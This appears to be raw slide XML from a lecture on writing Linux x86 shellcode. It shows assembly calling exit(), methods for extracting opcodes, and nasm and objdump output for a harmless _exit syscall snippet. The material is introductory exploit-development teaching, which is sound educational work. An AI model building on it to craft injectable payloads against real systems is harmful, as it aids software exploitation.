            <a:fld id="{C1E1B171-51F1-4151-9101-41018101C121}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2209680"/>
            <a:ext cx="5105160" cy="3047760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>push dword 0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>call 0x8048284</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>add esp, 4</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; status</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; Call the libc exit() function (address obtained</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>from the above disassembly)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>; Clean up the stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>we only have to get the opcodes corresponding to the assembler instructions. There are typically three methods to get the opcodes:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Writing them manually in hex (with the Intel® dcoumentation at hand!),</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Writing the assembly code and then extracting the opcodes,</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Writing the C code and disassebling it.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165"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66" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{61B1B101-71E1-4151-91D1-51A161F10141}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Writing Shellcode</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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>The second method is by far the most efficent and  widespread, though we will see that all methods lead to the same results. Our first step will be to use the assembly code from the previous "exit.asm" example to write a shellcode that, using the _exit(2) syscall, will make the application exit cleanly. To get the opcodes, we will first assemble the code with nasm and then disassemble the freshly built binary with objdump:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169"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70" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{11F1E101-0131-4121-B111-01715131B1B1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>In Assembler</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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173"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74" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{B1714101-E1E1-41D1-B131-E151C10181C1}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072880" y="2118960"/>
            <a:ext cx="3687840" cy="4647600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="cfe7f5"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="1" bIns="0" lIns="0" rIns="0" tIns="0" wrap="none"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ nasm -f elf exit.asm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$ objdump -d exit.o</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>exit.o:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>file format elf32-i386</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>Disassembly of section .text:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>00000000 &lt;.text&gt;:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>0:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>bb 00 00 00 00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>5:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>b8 01 00 00 00</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>a:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>cd 80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$0x0,%ebx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$0x1,%eax</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="WenQuanYi Micro Hei"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn dur="indefinite" id="7" nodeType="tmRoot" restart="never">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="8" nodeType="mainSeq">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699120" y="2248200"/>
            <a:ext cx="7745040" cy="3877560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Introduction a Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>System Calls</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>Writing a Shellcode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688320" y="570240"/>
            <a:ext cx="7755840" cy="1053720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="895d1d"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>موضوعات</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="TextShape 3"/>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95" name="TextShape 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="-11796840" cy="-11796840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="45000" lIns="90000" rIns="90000" tIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{719121E1-0191-4161-9161-C101E1112161}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Book Antiqua"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>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699120" y="533520"/>
            <a:ext cx="7745040" cy="5592240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont charset="2" typeface="Wingdings"/>
